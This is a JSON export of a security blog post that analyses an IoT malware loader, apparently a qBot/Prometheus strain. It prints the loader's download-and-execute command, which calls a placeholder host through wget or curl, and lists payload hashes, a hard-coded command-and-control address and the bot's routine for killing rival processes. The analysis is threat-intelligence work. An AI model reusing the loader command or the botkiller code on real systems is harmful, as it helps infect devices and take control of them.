{"id":11212,"date":"2017-03-09T22:42:19","date_gmt":"2017-03-09T22:42:19","guid":{"rendered":"https:\/\/evosec.eu\/?p=11212"},"modified":"2017-03-10T16:02:26","modified_gmt":"2017-03-10T16:02:26","slug":"new-iot-malware-loader-privatgodgg-sh","status":"publish","type":"post","link":"https:\/\/evosec.eu\/da\/new-iot-malware-loader-privatgodgg-sh\/","title":{"rendered":"A new IoT malware loader: &#8220;privatgodgg.sh&#8221;"},"content":{"rendered":"<p>As usual, it targets ARM-based devices and it tries to download other files (privntpd1, privsshd1, privopenssh1, privbash1, privtftp1, privwget1 etc) via curl or wget (whichever is available on the infected devices).<\/p>\n<p>As usual, we suspect this loader to be injected via unauthenticated telnet\/hard-coded credentials &#8211; although it could be a RCE, but we haven&#8217;t found indications about that.<\/p>\n<p>As soon as it finishes downloading the file, the loader changes it&#8217;s mode to executable (<strong>chmod +x privntpd1<\/strong>), runs it and then deletes it &#8211; making us suspect that this is another one that resides in the memory &#8211; probably until a reboot\/reset.<\/p>\n<pre class=\"prettyprint\">cd &#47;tmp || cd &#47;var&#47;run || cd &#47;mnt || cd &#47;root || cd &#47;; wget http:&#47;&#47;{SOMEIP}&#47;privcron1; curl -O http:&#47;&#47;{SOMEIP}&#47;privcron1; chmod +x privcron1; .&#47;privcron1; rm -rf privcron1<\/pre>\n<p>The priv* files that it downloads target several architectures including Intel PCs(x86\/x64):<\/p>\n<blockquote>\n<p>privapache21: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped<br \/>\nprivbash1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped<br \/>\nprivcron1: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped<br \/>\nprivftp1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped<br \/>\nprivntpd1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped<br \/>\nprivnut1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped<br \/>\nprivopenssh1: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped<br \/>\nprivpftp1: ELF 32-bit MSB executable, Motorola 68020, version 1 (SYSV), statically linked, not stripped<br \/>\nprivsh1: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped<br \/>\nprivsshd1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped<br \/>\nprivtftp1: ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, not stripped<br \/>\nprivwget1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped<\/p>\n<\/blockquote>\n<p>MD5:<\/p>\n<blockquote>\n<p>bd52d96a2646c27ff578c9e386194c06 privapache21<br \/>\n<strong>fcae6f9865ccac9e017b662a03bb75e4 privatgodgg.sh<\/strong><br \/>\n249516d6474ad15af5f66ae060517e88 privbash1<br \/>\n18380f4582c90a3ed6456bae480af7e1 privcron1<br \/>\naaab902c9a346d7e92fe2df6053e9034 privftp1<br \/>\n2590f61ecb53d5b0dc8d5d3c38a47430 privntpd1<br \/>\n5dfabb95131f845b6a525865c73d5a03 privnut1<br \/>\nee1cd2ee7292a0849b00438e7fd04b73 privopenssh1<br \/>\n1301bf22e80926ba6c6fc2a0f961a0a6 privpftp1<br \/>\n3a922d0203abd12cb87fac752a8456fd privsh1<br \/>\nb1a1474f1d8069fa3faf6a5fe99335a6 privsshd1<br \/>\n3eac59126a9cc85c1b66d0bc7b113104 privtftp1<br \/>\n5053e83937be0c2d72317278e097dfb9 privwget1<\/p>\n<\/blockquote>\n<p>Due to the fact that it uses the string &#8220;\/tmp\/yuagwduiagwdhg\/a&#8221; inside it, we think it&#8217;s another strain of qBot &#8211; or Prometheus.<\/p>\n<p>Also, in it&#8217;s sources (that we later aquired) we could identify the following header:<\/p>\n<pre class=\"prettyprint\">\r\n&#47;*\r\n   This was given to someone I considered as a good friend :&#47;\r\n   Its was being sold under my nose\r\n   This was given to a friend out of a token of my graditude since he\r\n   wanted to fuck over well ill just post here\r\n   Shit dont work #StankyMalware #MalwareMustDie #StopHacking2017\r\n*&#47;\r\n<\/pre>\n<p>,<\/p>\n<pre class=\"prettyprint\">\r\n&#47;*\r\n                  This is the official build of PROMETHEUS\r\n                                     ___________\r\n                                    &#47;&#47;LEAKED M8\\\\\r\n                                    \\\\THIS REPS&#47;&#47;\r\n                                     \\\\_______&#47;&#47;\r\n                  Yeah thats right this shit reps you gone be a big\r\n                               Goat Greper like cheats\r\n                  Just a lil credz to all the peeps that made this possible\r\n                                        B1NARY\r\n                                        ZONEHAX\r\n                                        CHEATS\r\n                                  Thanks to them this\r\n                                  bot is as dank as it\r\n                                  is XD this is the main\r\n                                  build if you have this\r\n                                  means you&#39;re an OG.\r\n\r\n                                V4 OFFICIAL FINAL BUILD\r\n                                         Contains Multi-Threaded HTTP ATTACK\r\n                                                        Thanks for buying enjoy big boat reps\r\n                                                        This was the offical final real build\r\n                                                        of Prometheus the one that&#39;s &#34;leaked&#34;\r\n                                                        was the one I was selling this is the\r\n                                                        real one that I only sold to 3 people\r\n*&#47;\r\n<\/pre>\n<p>and a CNC server that resides at<\/p>\n<pre class=\"prettyprint\">\r\nunsigned char *commServer&#91;&#93; ={&#34;89.34.99.131:23&#34;}; &#47;&#47; &#91;N.B. not available at this time&#93;\r\n<\/pre>\n<p>Interesting enough, as the guys at <a href=\"https:\/\/www.incapsula.com\/blog\/malware-analysis-mirai-ddos-botnet.html\" target=\"_blank\">Imperva &#8211; Incapsula<\/a> have already found out in a MIRAI variant, this one doesn&#8217;t like other bots too:<\/p>\n<pre class=\"prettyprint\">const char *knownBots&#91;&#93; = {\r\n\t&#34;mips&#34;,\r\n\t&#34;mipsel&#34;,\r\n\t&#34;sh4&#34;,\r\n\t&#34;x86&#34;,\r\n\t&#34;i686&#34;,\r\n\t&#34;ppc&#34;,\r\n\t&#34;i586&#34;,\r\n\t&#34;i586&#34;,\r\n\t&#34;jackmy*&#34;,\r\n\t&#34;hackmy*&#34;,\r\n\t&#34;arm*&#34;,\r\n\t&#34;b1&#34;,\r\n\t&#34;b2&#34;,\r\n\t&#34;b3&#34;,\r\n\t&#34;b4&#34;,\r\n\t&#34;b5&#34;,\r\n\t&#34;b6&#34;,\r\n\t&#34;b7&#34;,\r\n\t&#34;b8&#34;,\r\n\t&#34;b9&#34;,\r\n\t&#34;busyboxterrorist&#34;,\r\n\t&#34;DFhxdhdf&#34;,\r\n\t&#34;dvrHelper&#34;,\r\n\t&#34;FDFDHFC&#34;,\r\n\t&#34;FEUB&#34;,\r\n\t&#34;FTUdftui&#34;,\r\n\t&#34;GHfjfgvj&#34;,\r\n\t&#34;jhUOH&#34;,\r\n\t&#34;JIPJIPJj&#34;,\r\n\t&#34;JIPJuipjh&#34;,\r\n\t&#34;kmyx86_64&#34;,\r\n\t&#34;lolmipsel&#34;,\r\n\t&#34;mips&#34;,\r\n\t&#34;mipsel&#34;,\r\n\t&#34;RYrydry&#34;,\r\n\t&#34;tel*&#34;,\r\n\t&#34;TwoFace*&#34;,\r\n\t&#34;UYyuyioy&#34;,\r\n\t&#34;wget&#34;,\r\n\t&#34;x86_64&#34;,\r\n\t&#34;XDzdfxzf&#34;,\r\n\t&#34;xxb*&#34;,\r\n\t&#34;sh&#34;,\r\n\t&#34;1&#34;,\r\n\t&#34;2&#34;,\r\n\t&#34;3&#34;,\r\n\t&#34;4&#34;,\r\n\t&#34;5&#34;,\r\n\t&#34;6&#34;,\r\n\t&#34;7&#34;,\r\n\t&#34;8&#34;,\r\n\t&#34;9&#34;,\r\n\t&#34;10&#34;,\r\n\t&#34;11&#34;,\t\r\n\t&#34;12&#34;,\r\n\t&#34;13&#34;,\r\n\t&#34;14&#34;,\r\n\t&#34;15&#34;,\r\n\t&#34;16&#34;,\r\n\t&#34;17&#34;,\r\n\t&#34;18&#34;,\r\n\t&#34;19&#34;,\r\n\t&#34;20&#34;,\r\n\t&#34;hackz&#34;,\r\n\t&#34;bin*&#34;,\r\n\t&#34;gtop&#34;,\r\n\t&#34;ftp*&#34;,\r\n\t&#34;tftp*&#34;,\r\n\t&#34;botnet&#34;,\r\n\t&#34;swatnet&#34;,\r\n\t&#34;ballpit&#34;,\r\n\t&#34;fucknet&#34;,\r\n\t&#34;cracknet&#34;,\r\n\t&#34;weednet&#34;,\r\n\t&#34;gaynet&#34;,\r\n\t&#34;queernet&#34;,\r\n\t&#34;ballnet&#34;,\r\n\t&#34;unet&#34;,\r\n\t&#34;yougay&#34;,\r\n\t&#34;sttftp&#34;,\r\n\t&#34;sstftp&#34;,\r\n\t&#34;sbtftp&#34;,\r\n\t&#34;btftp&#34;,\r\n\t&#34;y0u1sg3y&#34;,\r\n\t&#34;bruv*&#34;,\r\n\t&#34;IoT*&#34;,\r\n};\r\n&#91;...&#93;\r\nvoid botkiller(){\r\n\tint i;\r\n\twhile(1){\r\n\t\tfor(i = 0; i &lt; 9; i++){\r\n\t\t\tchar command&#91;80&#93;;\r\n\t\t\tsprintf(command, &#34;pkill -9 &#34;);\r\n\t\t\tstrcat(command, knownBots&#91;i&#93;);\r\n\t\t\tsystem(command);\r\n\t\t\tsprintf(command, &#34;pkill -9 \\&#34;&#34;);\r\n\t\t\tstrcat(command, knownBots&#91;i&#93;);\r\n\t\t\tstrcat(command, &#34;\\&#34;&#34;);\r\n\t\t\tsystem(command);\r\n\t\t}\r\n\t\tsleep(5);\r\n\t}\r\n}\r\n<\/pre>\n<p>Although we are not sure that the author really knows what he targets with the <strong>void botkiller()<\/strong> subroutine.<\/p>\n<p>[probably more to come...]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As usual, it targets ARM-based devices and it tries to download other files (privntpd1, privsshd1, privopenssh1, privbash1, privtftp1, privwget1 etc) via curl or wget (whichever is available on the infected devices). As usual, we suspect this loader to be injected via unauthenticated telnet\/hard-coded credentials &#8211; although it could be a &hellip;<\/p>\n","protected":false},"author":1,"featured_media":11216,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[947,99],"tags":[74,60,987],"class_list":["post-11212","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-it-security","category-it-security-newsupdates","tag-iot","tag-malware","tag-qbot"],"translation":{"provider":"WPGlobus","version":"3.0.2","language":"da","enabled_languages":["en","da","de","es","fi","fr","it","hu","nl","no","pl","pt","ru","sv"],"languages":{"en":{"title":true,"content":true,"excerpt":false},"da":{"title":false,"content":false,"excerpt":false},"de":{"title":false,"content":false,"excerpt":false},"es":{"title":false,"content":false,"excerpt":false},"fi":{"title":false,"content":false,"excerpt":false},"fr":{"title":false,"content":false,"excerpt":false},"it":{"title":false,"content":false,"excerpt":false},"hu":{"title":false,"content":false,"excerpt":false},"nl":{"title":false,"content":false,"excerpt":false},"no":{"title":false,"content":false,"excerpt":false},"pl":{"title":false,"content":false,"excerpt":false},"pt":{"title":false,"content":false,"excerpt":false},"ru":{"title":false,"content":false,"excerpt":false},"sv":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/posts\/11212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/comments?post=11212"}],"version-history":[{"count":3,"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/posts\/11212\/revisions"}],"predecessor-version":[{"id":11261,"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/posts\/11212\/revisions\/11261"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/media\/11216"}],"wp:attachment":[{"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/media?parent=11212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/categories?post=11212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/evosec.eu\/da\/wp-json\/wp\/v2\/tags?post=11212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}